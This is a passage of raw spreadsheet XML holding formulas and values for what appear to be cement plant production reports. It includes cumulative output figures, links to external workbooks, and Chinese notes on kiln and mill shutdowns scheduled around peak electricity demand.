      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>70225</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]21'!$Y$29</f>
        <v>3741.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]21'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'20'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]21'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'20'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]21'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]21'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]21'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]21'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]21'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]21'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]21'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]21'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]21'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'20'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'20'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]21'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]21'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]21'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'20'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]21'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'20'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]21'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'20'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'20'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]21'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]21'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]21'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'20'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]21'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'20'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]21'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'20'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'20'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]21'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]21'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]21'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'20'!U48</f>
        <v>555.83</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6582.36</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]21'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'20'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]21'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'20'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'20'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]21'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]21'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]21'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'20'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]21'!$V$8</f>
        <v>543.28</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'20'!X49</f>
        <v>1044.32</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>177574.66</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]21'!$Y$8</f>
        <v>9549.30500000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'20'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'20'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]21'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]21'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]21'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'20'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]21'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'20'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]21'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]21'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]21'!$E$24</f>
        <v>3443</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'20'!H51</f>
        <v>81630.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1458029.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]21'!$I$24</f>
        <v>5255.6</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'20'!K51</f>
        <v>103227.779</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1466351.71</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]21'!$L$24</f>
        <v>27101.9049999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>60.2264555555551</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]21'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]21'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]21'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'20'!U51</f>
        <v>3621.92</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66620.391</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]21'!$V$30</f>
        <v>142</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'20'!X51</f>
        <v>3451.688</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>64067.925</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]21'!$Y$30</f>
        <v>3421.60600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]21'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]21'!$E$19</f>
        <v>3774.34000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'20'!H52</f>
        <v>5773.53000000042</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1389340.78</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]21'!$I$19</f>
        <v>2545</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'20'!K52</f>
        <v>77475.495</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1359169.695</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]21'!$L$19</f>
        <v>33344.4780000506</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>22.9961917241728</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'[13]21'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]21'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'20'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]21'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'20'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]21'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]21'!$M$21+'[14]21'!$M$22+'[14]21'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]21'!$N$21+'[14]21'!$N$22+'[14]21'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'20'!U53</f>
        <v>924.05</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39258.477</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]21'!$Q$21+'[14]21'!$Q$22+'[14]21'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'20'!X53</f>
        <v>739</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40230</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]21'!$T$21+'[14]21'!$T$22+'[14]21'!$T$35</f>
        <v>1833.997</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]21'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'20'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]21'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'20'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]21'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]21'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]21'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]21'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'20'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]21'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'20'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]21'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]21'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'20'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]21'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'20'!K55</f>
        <v>5738.81</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>41174.46</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]21'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]21'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]21'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]21'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]21'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]21'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]21'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]21'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]21'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'20'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'20'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]21'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：9:40-22:10避峰停机；4#磨：10:00-22:10避峰停机。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G57+'20'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'20'!K57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G58+'20'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'20'!K58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G59+'20'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'20'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]21'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:40-24:00避峰停机。D1#磨：8:50-24:00避峰停机，D2#磨：8:50-24:00避峰停机。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G60+'20'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'20'!K60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'[14]21'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]21'!$E$6</f>
        <v>6067</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'20'!H61</f>
        <v>78513</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1194386</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]21'!$E$21</f>
        <v>3636.83</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'20'!K61</f>
        <v>82652.3</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1183812.38</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]21'!$H$6</f>
        <v>33629.8699999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>64.6728269230767</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'[14]21'!$M$11+'[14]21'!$M$12+'[14]21'!$M$13+'[14]21'!$M$14+'[14]21'!$M$15+'[14]21'!$M$16+'[14]21'!$M$17+'[14]21'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]21'!$N$11+'[14]21'!$N$12+'[14]21'!$N$13+'[14]21'!$N$14+'[14]21'!$N$15+'[14]21'!$N$16+'[14]21'!$N$17+'[14]21'!$N$18</f>
        <v>3752</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'20'!H62</f>
        <v>58625</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>894618.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]21'!$Q$11+'[14]21'!$Q$12+'[14]21'!$Q$13+'[14]21'!$Q$14+'[14]21'!$Q$15+'[14]21'!$Q$16+'[14]21'!$Q$17+'[14]21'!$Q$18</f>
        <v>4117</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'20'!K62</f>
        <v>56236</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>890708.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]21'!$T$11+'[14]21'!$T$12+'[14]21'!$T$13+'[14]21'!$T$14+'[14]21'!$T$15+'[14]21'!$T$16+'[14]21'!$T$17+'[14]21'!$T$18</f>
        <v>20843.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>83.3745359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]21'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]21'!$M$19+'[14]21'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]21'!$N$19+'[14]21'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'20'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]21'!$Q$19+'[14]21'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'20'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]21'!$T$19+'[14]21'!$T$20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G64+'20'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'20'!K64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G65+'20'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'20'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]21'!$Q$74</f>
        <v>1#窑:续停；2#窑:窑减产，窑尾托轮轴瓦磨合；1#磨:正常。2#磨:8:45-24:00避峰停机。3#磨:0:00-22:30库满停机。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G66+'20'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'20'!K66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G67+'20'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'20'!K67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'[15]21'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]21'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'20'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]21'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'20'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]21'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]21'!$Q$77</f>
        <v>1#磨14:30-22:10避峰停机:7.67小时(避峰)。2#磨运行正常。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]21'!$D$43+'[15]21'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]21'!$E$43+'[15]21'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'20'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]21'!$H$43+'[15]21'!$H$44</f>
        <v>0</v>
